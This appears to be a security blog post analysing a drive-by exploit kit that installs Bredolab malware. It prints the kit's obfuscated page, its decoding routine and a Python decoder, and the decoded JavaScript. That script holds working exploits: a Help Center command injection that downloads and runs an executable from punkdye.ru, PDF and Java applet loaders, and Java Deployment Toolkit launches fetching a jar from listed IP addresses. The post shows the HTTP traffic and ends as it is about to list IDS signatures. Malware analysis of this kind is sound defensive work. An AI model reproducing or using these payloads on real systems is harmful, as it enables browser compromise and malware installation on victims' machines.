&lt;div name="K69m8203" id="K69m8203"&gt;34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q43Q43Q34Q50Q64Q43Q43Q34Q50Q64Q112Q118Q112Q102Q107Q99Q108Q106Q94Q102Q107Q43Q101Q113Q106Q34Q114Q45Q45Q48Q99Q112Q115Q111Q58Q34Q48Q64Q112Q96Q111Q102Q109Q113Q40Q97Q98Q99Q98Q111Q34Q48Q66Q98Q115Q94Q105Q34Q47Q53Q114Q107Q98Q112Q96Q94Q109Q98Q34Q47Q53Q34Q47Q52Q107Q98Q116Q34Q47Q63Q62Q96Q113Q102Q115Q98Q85Q76Q95Q103Q98Q96Q113Q34Q47Q50Q47Q53Q34Q47Q50Q47Q47Q116Q112Q96Q111Q102Q109Q113Q43Q112Q101Q98Q105Q105Q34Q47Q50Q47Q47Q34Q47Q50Q47Q54Q43Q79Q114Q107Q34Q47Q50Q47Q53Q34Q47Q50Q47Q47Q96Q106Q97Q34Q47Q63Q34Q47Q50Q47Q67Q96Q34Q47Q63Q96Q97Q34Q47Q63Q43Q43Q34Q47Q50Q47Q67Q34Q47Q50Q47Q51Q98Q96Q101Q108Q34Q47Q63Q99&lt;/div&gt;
&lt;div name="Wq67wbxt8" id="Wq67wbxt8"&gt;Q114Q107Q96Q113Q102Q108Q107Q34Q47Q63Q94Q54Q34Q47Q50Q47Q53Q95Q51Q34Q47Q50Q47Q54Q34Q47Q50Q52Q63Q111Q83Q92Q92Q34Q47Q50Q48Q63Q99Q108Q111Q34Q47Q50Q47Q53Q102Q83Q95Q51Q43Q105Q98Q107Q100Q113Q101Q34Q47Q50Q48Q63Q102Q34Q47Q50Q48Q66Q83Q45Q34Q47Q50Q48Q63Q102Q42Q42Q34Q47Q50Q47Q54Q111Q34Q47Q50Q47Q63Q83Q95Q51Q43Q96Q101Q94Q111Q62Q113Q34Q47Q50Q47Q53Q102Q34Q47Q50Q47Q54Q34Q47Q50Q48Q63Q111Q98Q113Q114Q111Q107Q34Q47Q63Q111Q34Q47Q50Q52Q65Q107Q98Q116Q34Q47Q63Q67Q114Q107Q96Q113Q102Q108Q107Q34Q47Q50Q47Q53Q94Q54Q34Q47Q50Q47Q53Q92Q34Q47Q50Q48Q63Q34Q47Q50Q47Q54Q47Q34Q47Q50Q47Q64Q71Q98Q117Q98Q43Q113Q111Q94Q113Q112Q71Q34Q47Q50Q47Q53Q34Q47Q50Q50Q65Q71Q98Q105Q102Q71Q34Q47Q50Q410007Q63Q71Q67Q108Q81Q98Q115Q94Q80Q71Q34Q47Q50Q50Q63Q108Q34Q47Q50Q48Q63Q34Q47Q50Q47Q54Q34Q47Q50Q50Q65Q71Q118Q97Q108Q63Q98Q112Q107Q108Q71Q34Q47Q50Q47Q63Q71Q109Q112Q98Q111Q71Q34Q47Q50Q50Q63Q117Q34Q47Q50Q47Q53Q98Q113Q102Q111Q84Q43Q108Q34Q47Q50Q48Q63Q34Q47Q50Q47Q54Q34Q47Q50Q47Q53Q107Q98Q109Q76Q43Q108Q34Q47Q50Q48Q63Q46Q83Q98Q109Q118Q81Q43Q108Q34Q47Q50Q48Q63Q48Q83Q98Q97Q108Q74Q43Q108Q34Q47Q50Q48Q63Q34Q47Q50Q47Q54Q105Q105Q114Q107Q34Q47Q50Q47Q53Q97Q107Q98Q112Q43Q117Q34Q47Q50Q48Q63Q34Q47Q50Q47Q54Q45Q34Q47Q50Q47Q64Q71Q46Q83Q97Q102Q109Q34Q47Q50Q47Q51Q46Q83Q97Q102Q34Q47Q50Q48Q67Q109Q101Q109Q43Q98Q106Q108Q96Q105Q98Q116Q34Q47Q50Q47Q67Q45Q53Q45Q53Q34Q47Q50Q48Q62Q114Q111Q43Q98Q118Q97Q104Q107Q114Q109Q34Q47Q50Q47Q67Q34Q47Q50Q47Q67Q34Q47Q50Q48Q62Q109Q113Q113Q101Q71Q34Q47Q50Q47Q64Q71Q81Q66Q68Q71Q3&lt;/div&gt;
&lt;div name="Kpe0uous6" id="Kpe0uous6"&gt;4Q47Q50Q47Q53Q107Q98Q109Q108Q43Q117Q34Q47Q50Q48Q63Q34Q47Q50Q47Q54Q71Q77Q81Q81Q69Q73Q71Q34Q47Q50Q47Q63Q71Q74Q85Q43Q113Q99Q108Q112Q108Q111Q96Q102Q74Q71Q34Q47Q50Q47Q53Q94Q34Q47Q63Q116Q98Q107Q83Q117Q34Q47Q50Q48Q63Q34Q47Q50Q47Q54Q118Q34Q47Q50Q47Q53Q94Q34Q47Q63Q116Q98Q107Q83Q108Q34Q47Q50Q48Q63Q71Q106Q94Q98Q111Q113Q80Q43Q63Q65Q76Q65Q62Q71Q83Q118Q34Q47Q50Q48Q63Q34Q47Q50Q50Q65Q71Q113Q96Q98Q71Q34Q47Q50Q47Q63Q71Q103Q95Q76Q85Q98Q115Q102Q71Q34Q47Q50Q47Q63Q71Q113Q96Q62Q71Q34Q47Q50Q50Q63Q112Q102Q101Q113Q34Q47Q63Q83Q34Q47Q63Q94Q92Q34Q47Q50Q47Q54Q34Q47Q50Q47Q54Q34Q47Q50Q47Q53Q34Q47Q50Q47Q54Q34Q47Q50Q48Q63Q34Q47Q50Q48Q66Q43Q103Q112Q34Q47Q50Q47Q51Q96Q112Q96Q111Q102Q109Q113Q34Q47Q63Q43Q103Q112Q34Q47Q50Q47Q51Q97Q98Q105Q34Q47Q63Q34Q47Q50Q47Q67Q110Q34Q47Q63Q43Q103Q112Q34Q47Q50Q47Q51Q112Q113Q94Q111Q113Q43Q98Q117Q98Q34Q47Q50Q52Q64Q113Q94Q112Q104Q104Q102Q105Q105Q34Q47Q63Q34Q47Q50Q47Q67Q67Q34Q47Q63Q34Q47Q50Q47Q67Q70Q74Q34Q47Q63Q101Q98Q105Q109Q34Q47Q50Q47Q62Q34Q47Q50Q47Q47Q43Q111Q98Q109Q105Q94Q96Q98Q34Q47Q50Q47Q53Q34Q47Q50Q47Q67Q71Q34Q47Q50Q47Q67Q100Q34Q47Q50Q47Q64Q80Q113Q111Q102Q107Q100Q43Q99Q111Q108Q106Q64Q101Q94Q111Q64Q108Q97Q98Q34Q47Q50Q47Q53Q48Q49Q34Q47Q50Q47Q54Q34Q47Q50Q47Q54Q43Q111Q98Q109Q105Q94Q96Q98Q34Q47Q50Q47Q53Q34Q47Q50Q47Q67Q83Q34Q47Q50Q47Q67Q100Q34Q47Q50Q47Q64Q80Q113Q111Q102Q107Q100Q43Q99Q111Q108Q106Q64Q101Q94Q111Q64Q108Q97Q98Q34Q47Q50Q47Q53Q51Q46Q34Q47Q50Q47Q54Q34Q47Q50Q47Q54Q43Q111Q98Q109Q105Q94Q96Q98Q34Q47Q50Q47Q53Q34Q47Q5&lt;/div&gt;
&lt;div name="Yj0jepw" id="Yj0jepw"&gt;0Q47Q67Q92Q34Q47Q50Q47Q67Q100Q34Q47Q50Q47Q64Q80Q113Q111Q102Q107Q100Q43Q99Q111Q108Q106Q64Q101Q94Q111Q64Q108Q97Q98Q34Q47Q50Q47Q53Q48Q54Q34Q47Q50Q47Q54Q34Q47Q50Q47Q54Q34Q47Q50Q47Q64Q45Q34Q47Q50Q47Q64Q46Q34Q47Q50Q47Q54Q34Q47Q52Q34Q47Q54Q34Q47Q54Q34Q48Q64Q34Q47Q67Q112Q96Q111Q102Q109Q113Q34Q48Q66Q89Q31Q59Q57Q44Q102Q99Q111Q94Q106Q98Q59Q31Q38Q56Q7Q29Q29Q29Q29Q65Q51Q95Q102Q119Q52Q50Q45Q29Q58Q29Q107Q98Q116Q29Q62Q111Q111Q94Q118Q37Q31Q62Q96Q111Q108Q77Q65Q67Q43Q77Q65Q67Q31Q41Q29Q31Q77Q65Q67Q43Q77Q97Q99Q64Q113Q111Q105Q31Q38Q56Q7Q29Q29Q29Q29Q99Q108Q111Q37Q102Q29Q102Q107Q29Q65Q51Q95Q102Q119Q52Q50Q45Q38Q120Q7Q29Q29Q29Q29Q29Q29Q29Q29Q113Q111Q118Q120Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q78Q96Q97Q100Q96Q102Q102Q29Q58Q29Q107Q98Q116Q29Q62Q96Q113Q102Q115Q98Q85Q76Q95Q103Q98Q96Q113Q37Q65Q51Q95Q102Q119Q52Q50Q45Q88Q102Q90Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q102Q99Q29Q37Q78Q96Q97Q100Q96Q102Q102Q38Q120Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q85Q107Q50Q46Q110Q46Q29Q58Q29Q97Q108Q96Q114Q106Q98Q107Q113Q43Q96Q111Q98Q94Q113Q98Q66Q105Q98Q106Q98Q107Q113Q37Q31Q102Q99Q111Q94Q106Q98Q31Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q85Q107Q50Q46Q110Q46Q43Q112Q98Q113Q62Q113Q113Q111Q102Q95Q114Q113Q98Q37Q31Q112Q111Q96Q31Q41Q29Q31Q75Q108Q113Q98Q112Q46Q43Q109Q97Q99Q31Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q97Q108Q96Q114Q106Q98Q107Q113Q43Q95Q108Q97Q118Q43Q94Q109Q109Q98Q107Q97Q64Q101Q102Q105Q97Q37Q85Q107Q50Q46Q110Q46Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q122Q7Q2&lt;/div&gt;
&lt;div name="Myiyhsd" id="Myiyhsd"&gt;9Q29Q29Q29Q29Q29Q29Q29Q122Q96Q94Q113Q96Q101Q37Q98Q38Q120Q122Q7Q29Q29Q29Q29Q122Q7Q29Q29Q29Q29Q7Q29Q29Q29Q29Q113Q111Q118Q120Q7Q29Q29Q29Q29Q102Q99Q29Q37Q107Q94Q115Q102Q100Q94Q113Q108Q111Q43Q103Q94Q115Q94Q66Q107Q94Q95Q105Q98Q97Q37Q38Q38Q120Q7Q29Q29Q29Q29Q29Q29Q29Q29Q66Q99Q98Q53Q46Q101Q113Q95Q29Q58Q29Q97Q108Q96Q114Q106Q98147cQ107Q113Q43Q96Q111Q98Q94Q113Q98Q66Q105Q98Q106Q98Q107Q113Q37Q31Q102Q99Q111Q94Q106Q98Q31Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q66Q99Q98Q53Q46Q101Q113Q95Q43Q112Q98Q113Q62Q113Q113Q111Q102Q95Q114Q113Q98Q37Q31Q112Q111Q96Q31Q41Q29Q31Q62Q109Q109Q105Q98Q113Q46Q43Q101Q113Q106Q105Q31Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q97Q108Q96Q114Q106Q98Q107Q113Q43Q95Q108Q97Q118Q43Q94Q109Q109Q98Q107Q97Q64Q101Q102Q105Q97Q37Q66Q99Q98Q53Q46Q101Q113Q95Q38Q56Q7Q29Q29Q29Q29Q29Q122Q7Q29Q29Q29Q29Q29Q122Q96Q94Q113Q96Q101Q37Q98Q38Q120Q122Q7Q29Q29Q29Q29Q7Q29Q29Q29Q29Q113Q111Q118Q120Q7Q29Q29Q29Q29Q102Q99Q29Q37Q107Q94Q115Q102Q100Q94Q113Q108Q111Q43Q103Q94Q115Q94Q66Q107Q94Q95Q105Q98Q97Q37Q38Q38Q120Q7Q29Q29Q29Q29Q29Q29Q29Q29Q7Q29Q29Q29Q29Q29Q29Q29Q29Q115Q94Q111Q29Q102Q109Q112Q29Q58Q29Q88Q31Q46Q52Q49Q43Q46Q49Q48Q43Q46Q49Q50Q43Q47Q48Q49Q31Q41Q29Q31Q46Q53Q49Q43Q53Q47Q43Q48Q53Q43Q51Q53Q31Q41Q29Q31Q46Q54Q53Q43Q46Q49Q50Q43Q46Q46Q51Q43Q52Q46Q31Q41Q29Q31Q47Q45Q52Q43Q46Q54Q46Q43Q47Q47Q54Q43Q46Q51Q51Q31Q41Q29Q31Q47Q45Q52Q43Q50Q53Q43Q46Q53Q54Q43Q46Q48Q48Q31Q41Q29Q31Q47Q46Q47Q43Q46Q52Q50Q43Q49Q50Q43Q47Q49Q50Q31Q41Q29Q31Q51Q53Q43Q47Q48Q48Q43Q49Q43Q47Q52Q31Q90Q56Q7&lt;/div&gt;
&lt;div name="Rn9yw5z" id="Rn9yw5z"&gt;Q29Q29Q29Q29Q29Q29Q29Q29Q115Q94Q111Q29Q102Q109Q29Q58Q29Q102Q109Q112Q88Q74Q94Q113Q101Q43Q111Q108Q114Q107Q97Q37Q74Q94Q113Q101Q43Q111Q94Q107Q97Q108Q106Q37Q38Q29Q39Q29Q37Q102Q109Q112Q43Q105Q98Q107Q100Q113Q101Q42Q46Q38Q29Q38Q90Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q7Q29Q29Q29Q29Q29Q29Q29Q29Q115Q94Q111Q29Q114Q29Q58Q29Q31Q101Q113Q113Q109Q55Q29Q42Q71Q42Q103Q94Q111Q29Q42Q71Q89Q89Q89Q89Q31Q40Q102Q109Q40Q31Q89Q89Q109Q114Q95Q105Q102Q96Q89Q89Q45Q45Q46Q43Q103Q94Q111Q29Q107Q108Q107Q98Q31Q56Q7Q7Q29Q29Q29Q29Q29Q29Q29Q29Q102Q99Q29Q37Q116Q102Q107Q97Q108Q116Q43Q107Q94Q115Q102Q100Q94Q113Q108Q111Q43Q94Q109Q109Q75Q94Q106Q98Q29Q58Q58Q29Q31Q74Q102Q96Q111Q108Q112Q108Q99Q113Q29Q70Q107Q113Q98Q111Q107Q98Q113Q29Q66Q117Q109Q105Q108Q111Q98Q111Q31Q38Q29Q120Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q115Q94Q111Q29Q108Q29Q58Q29Q97Q108Q96Q114Q106Q98Q107Q113Q43Q96Q111Q98Q94Q113Q98Q66Q105Q98Q106Q98Q107Q113Q37Q31Q76Q63Q71Q66Q64Q81Q31Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q108Q43Q96Q105Q94Q112Q112Q102Q97Q29Q58Q29Q31Q96Q105Q112Q102Q97Q55Q64Q62Q67Q66Q66Q67Q62Q64Q42Q65Q66Q64Q52Q42Q45Q45Q45Q45Q42Q45Q45Q45Q45Q42Q62Q63Q64Q65Q66Q67Q67Q66Q65Q64Q63Q62Q31Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q108Q43Q105Q94Q114Q107Q96Q101Q37Q114Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q122Q29Q98Q105Q112Q98Q29Q120Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q115Q94Q111Q29Q108Q29Q58Q29Q97Q108Q96Q114Q106Q98Q107Q113Q43Q96Q111Q98Q94Q113Q98Q66Q105Q98Q106Q98Q107Q113Q37Q31Q76Q63Q71Q66Q64Q81Q31Q38Q56Q7Q29Q29Q&lt;/div&gt;
&lt;div name="L5je7fp0v" id="L5je7fp0v"&gt;29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q115Q94Q111Q29Q107Q29Q58Q29Q97Q108Q96Q114Q106Q98Q107Q113Q43Q96Q111Q98Q94Q113Q98Q66Q105Q98Q106Q98Q107Q113Q37Q31Q76Q63Q71Q66Q64Q81Q31Q38Q56Q7Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q108Q43Q113Q118Q109Q98Q29Q58Q29Q31Q94Q109Q109Q105Q102Q96Q94Q113Q102Q108Q107Q44Q107Q109Q111Q114Q107Q113Q102Q106Q98Q42Q112Q96Q111Q102Q109Q113Q94Q95Q105Q98Q42Q109Q105Q114Q100Q102Q107Q56Q97Q98Q109Q105Q108Q118Q106Q98Q107Q113Q113Q108Q108Q105Q104Q102Q113Q31Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q107Q43Q113Q118Q109Q98Q29Q58Q29Q31Q94Q109Q109Q105Q102Q96Q94Q113Q102Q108Q107Q44Q103Q94Q115Q94Q42Q97Q98Q109Q105Q108Q118Q106Q98Q107Q113Q42Q113Q108Q108Q105Q104Q102Q113Q31Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q97Q108Q96Q114Q106Q98Q107Q113Q43Q95Q108Q97Q118Q43Q94Q109Q109Q98Q107Q97Q64Q101Q102Q105Q97Q37Q108Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q97Q108Q96Q114Q106Q98Q107Q113Q43Q95Q108Q97Q118Q43Q94Q109Q109Q98Q107Q97Q64Q101Q102Q105Q97Q37Q107Q38Q56Q7Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q113Q111Q118Q29Q120Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q108Q43Q105Q94Q114Q107Q96Q101Q37Q114Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q122Q29Q96Q94Q113Q96Q101Q29Q37Q98Q38Q29Q120Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q107Q43Q105Q94Q114Q107Q96Q101Q37Q114Q38Q56Q7Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q29Q122Q7Q29Q29Q29Q29Q29Q29Q29Q29Q122Q7Q29Q29Q29Q29Q122Q7Q29Q29Q29Q29Q122Q96Q94Q113Q96Q101Q37Q98Q38Q120Q122Q7Q29Q29Q29Q7Q29Q29Q29Q29&lt;/div&gt;
&lt;/div&gt;&lt;input type="checkbox" id="Hn6bgn" value="ent" checked="checked"&gt;&lt;div&gt;&lt;/div&gt;
&lt;script type="text/javascript" language="javascript" src="<span style="color: #ff0000;">jquery.jxx?v=5.3.4</span>"&gt;&lt;/script&gt;
&lt;script&gt;</pre>
<pre style="PADDING-LEFT: 30px">/*
setTimeout("window.replace", "1000");
*/
function Vrkhh92v(Hz7aw3e5){
Sip00o6a =  document;
Xkwimls51 = Sip00o6a.getElementById(Hz7aw3e5);
return Xkwimls51.innerHTML;
}
var G5y6hww = "";
var D7a95toi = ["Maz84dbeq", "K69m8203", "Wq67wbxt8", "Kpe0uous6", "Yj0jepw", "Myiyhsd", "Rn9yw5z", "L5je7fp0v"]
var G5y6hww = "";
for (Xeo365t in D7a95toi){
G5y6hww += Vrkhh92v(D7a95toi[Xeo365t]);
}
U6blttq5y = "document";</pre>
<pre style="PADDING-LEFT: 30px">U6blttq5y = eval(U6blttq5y);
if ( typeof(Mo9g0b0) == 'u(n.d.e%f.isn#e(d('.replace(/[\(\.%s#]/g, '')) Mo9g0b0 = "Pzjiudfwlw";
function D0irg1(Bufe23){U6blttq5y.write(Bufe23);}
function O7b076s(G5y6hww) {
Dw5jypjgw = G5y6hww.split(Mo9g0b0);
var Baout4e = "";
for (var Hz7aw3e5=0;Hz7aw3e5&lt;Dw5jypjgw.length-1;Hz7aw3e5++) {
Id3pgs = parseInt(Dw5jypjgw[Hz7aw3e5]);
Id3pgs += 3;
Baout4e += String.fromCharCode(Id3pgs);
}
return(Baout4e);
}</pre>
<pre style="PADDING-LEFT: 30px">D0irg1('&lt;script language="javascript"&gt;'+O7b076s(G5y6hww)+'&lt;[/[s[chr(i7p7t[&gt;h'.replace(/[h7k\[\(]/g, ''));</pre>
<pre style="PADDING-LEFT: 30px">&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;
0</pre>
<p>This then causes the client to request http://punkdye.ru:8080/jquery.jxx?v=5.3.4. This URI can be signatured with an IDS such as Snort to alert you that a client has been hitting one of these drive-by kits:</p>
<pre style="PADDING-LEFT: 30px">GET /jquery.jxx?v=5.3.4 HTTP/1.1
Accept: */*
Referer: http://punkdye.ru:8080/index.php?pid=1&amp;Cxuuxx0tgpkezo09=0
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
Host: punkdye.ru:8080
Connection: Keep-Alive
Cookie: pid=1</pre>
<p>The response to this request contains very little data, but that data is essential: it defines the variable Mo9g0b0 that the deobfuscation routine splits on, and without it the browser cannot decode and execute the data hidden in the div tags:</p>
<pre style="PADDING-LEFT: 30px">HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Aug 2010 &lt;REMOVED&gt;
Content-Type: text/javascript
Connection: close
Expires: 0
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Length: 22</pre>
<pre style="PADDING-LEFT: 30px">eval("Mo9g0b0='Q';");</pre>
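<p>As an added example (not code from the original post or from the kit), here is an analyst-side re-implementation in Python of the decoding step above: the concatenated div contents are split on the separator that jquery.jxx supplied as Mo9g0b0, each field is parsed as an integer, 3 is added and the result becomes a character. The sample page, div ids and helper names are constructed for this example.</p>

```python
import re

# Added example, not code from the original post or from the kit: an offline
# re-implementation of the kit's O7b076s() decoding step, so the script hidden
# in the divs can be recovered from a saved page without executing it.


def decode_div_payload(blob: str, separator: str) -> str:
    """Reverse the numeric-offset encoding used in the hidden divs.

    The kit splits on the separator (Mo9g0b0, delivered separately by the
    jquery.jxx response), parses each field as a decimal integer, adds 3 and
    takes the character with that code. Its loop stops at length-1, so the
    empty field after the trailing separator is ignored; we do the same.
    """
    fields = blob.split(separator)
    if len(fields) < 2:
        # Without the out-of-band key there is nothing to split on, which is
        # exactly why the page alone looks like inert text to a scanner.
        raise ValueError("separator %r not present in payload: wrong key?" % separator)
    out = []
    for field in fields[:-1]:
        try:
            code = int(field)
        except ValueError:
            # parseInt() would yield NaN here and fromCharCode(NaN) gives
            # "\x00"; fail loudly instead of silently producing junk.
            raise ValueError("non-numeric field %r in payload" % field)
        out.append(chr(code + 3))
    return "".join(out)


def encode_div_payload(script: str, separator: str) -> str:
    """Inverse transform, used only to build test data for this example."""
    return "".join("%d%s" % (ord(ch) - 3, separator) for ch in script)


def extract_div_blobs(html: str, div_ids) -> str:
    """Concatenate the text of the named divs in the order the kit's
    D7a95toi array lists them, as its for-loop does."""
    blobs = []
    for div_id in div_ids:
        match = re.search(
            r'<div[^>]*\bid="%s"[^>]*>(.*?)</div>' % re.escape(div_id), html, re.S)
        if match is None:
            raise ValueError("div %s not found" % div_id)
        blobs.append(match.group(1))
    return "".join(blobs)


# Constructed sample (not the captured page): two hidden divs holding the
# encoded script, with the separator 'Q' known only from the jquery.jxx reply.
SAMPLE_HTML = (
    '<div style="visibility: hidden;">'
    '<div name="Aa1b2" id="Aa1b2">115Q94Q111Q29Q</div>'
    '<div name="Cc3d4" id="Cc3d4">117Q29Q58Q29Q46Q56Q</div>'
    '</div>'
)
SAMPLE_DIV_ORDER = ["Aa1b2", "Cc3d4"]
SAMPLE_SEPARATOR = "Q"


def recover_script(html: str = SAMPLE_HTML, div_ids=SAMPLE_DIV_ORDER,
                   separator: str = SAMPLE_SEPARATOR) -> str:
    """Full pipeline: pull the div text out of the page, then decode it."""
    return decode_div_payload(extract_div_blobs(html, div_ids), separator)


if __name__ == "__main__":
    print(recover_script())  # prints: var x = 1;
```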
<p>Once the browser has this value, it can deobfuscate and execute the following JavaScript, which is the result of running the data hidden in the divs through the deobfuscation logic in the script above:</p>
<pre style="PADDING-LEFT: 30px">if((document.all)&amp;&amp;(navigator.appVersion.indexOf('MSIE 7.')!=-1)) document.write("&lt;iframe src=\"hcp://services/search?query=&amp;topic=hcp://system/sysinfo /sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A %%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript+defer%3Eeval%28unescape %28 %27new%2BActiveXObject%2528%2522wscript.shell%2522%2529.Run%2528%2522cmd %2B %252Fc%2Bcd%2B..%252F%2526echo%2Bfunction%2Ba9%2528b6%2529%257BrV__%253Bfor%2528iVb6.length%253Bi%253EV0%253Bi--%2529r%252BVb6.charAt%2528i%2529%253Breturn%2Br%257Dnew%2BFunction%2528a9%2528_%253B%25292%252CJexe.tratsJ%2528%255DJeliJ%25 ?BJFoTevaSJ%255Bo%253B%2529%255DJydoBesnoJ%252BJpserJ%255Bx%2528etirW.o%253B%2529%2528nepO.o%253B1VepyT.o%253B3VedoM.o%253B%2529llun%2528dnes.x%253B%25290%252CJ1Vdip%25261Vdi%253Fphp.emoclew%252F0808%253Aur.eydknup%252F%252F%253AptthJ%252CJTEGJ%2528nepo.x%253B%2529JPTTHLJ%252BJMX.tfosorciMJ%2528a%2BwenVx%253B%2529y%2528a%2BwenVo%253BJmaertS.BDODAJVy%253B%255DJtceJ%252BJjbOXeviJ%252BJtcAJ%255Bsiht%2BV%2Ba_%2529%2529%2528%2529%253B%253E.js%2526cscript%2B.js%2526del%2B%252Fq%2B.js%2526start.exe%257Ctaskkill%2B%252FF%2B%252FIM%2Bhelp%252A%2522.replace%2528%252FJ%252Fg%252CString.fromCharCode%252834%2529%2529.replace%2528%252FV%252Fg%252CString.fromCharCode%252861%2529%2529.replace%2528%252F_%252Fg%252CString.fromCharCode%252839%2529%2529%252C0%252C1%2529%27%29%29%3C%2Fscript%3E\"&gt;&lt;/iframe&gt;");
D6biz750 = new Array("AcroPDF.PDF", "PDF.PdfCtrl");
for(i in D6biz750){
try{
Qcdgcii = new ActiveXObject(D6biz750[i]);
if (Qcdgcii){
Xn51q1 = document.createElement("iframe");
Xn51q1.setAttribute("src", "Notes1.pdf");
document.body.appendChild(Xn51q1);
}
}catch(e){}
}
try{
if (navigator.javaEnabled()){
Efe81htb = document.createElement("iframe");
Efe81htb.setAttribute("src", "Applet1.html");
document.body.appendChild(Efe81htb);
}
}catch(e){}
try{
if (navigator.javaEnabled()){</pre>
<pre style="PADDING-LEFT: 30px">var ips = ["174.143.145.234", "184.82.38.68", "198.145.116.71", "207.191.229.166", "207.58.189.133", "212.175.45.245", "68.233.4.27"];
var ip = ips[Math.round(Math.random() * (ips.length-1) )];
var u = "http: -J-jar -J\\\\"+ip+"<a href="file://\\public\\001.jar">\\public\\001.jar</a> none";</pre>
<pre style="PADDING-LEFT: 30px">if (window.navigator.appName == "Microsoft Internet Explorer") {
var o = document.createElement("OBJECT");
o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
o.launch(u);
} else {
var o = document.createElement("OBJECT");
var n = document.createElement("OBJECT");
o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit";
n.type = "application/java-deployment-toolkit";
document.body.appendChild(o);
document.body.appendChild(n);
try {
o.launch(u);
} catch (e) {
n.launch(u);
}
}
}
}catch(e){}</pre>
<p>After this JavaScript executes in the browser, in the sample we captured it causes the client to download a PDF. If the client is vulnerable to that PDF, it then pulls down the executable malware payload. With Bredolab successfully installed, the client calls home to the controller. Luckily the great people over at <a href="http://www.snort.org/snort-rules/">SourceFire&#8217;s VRT</a> have had signatures for a while that trigger on these infections and help you clean them up quite easily. They are as follows:</p>
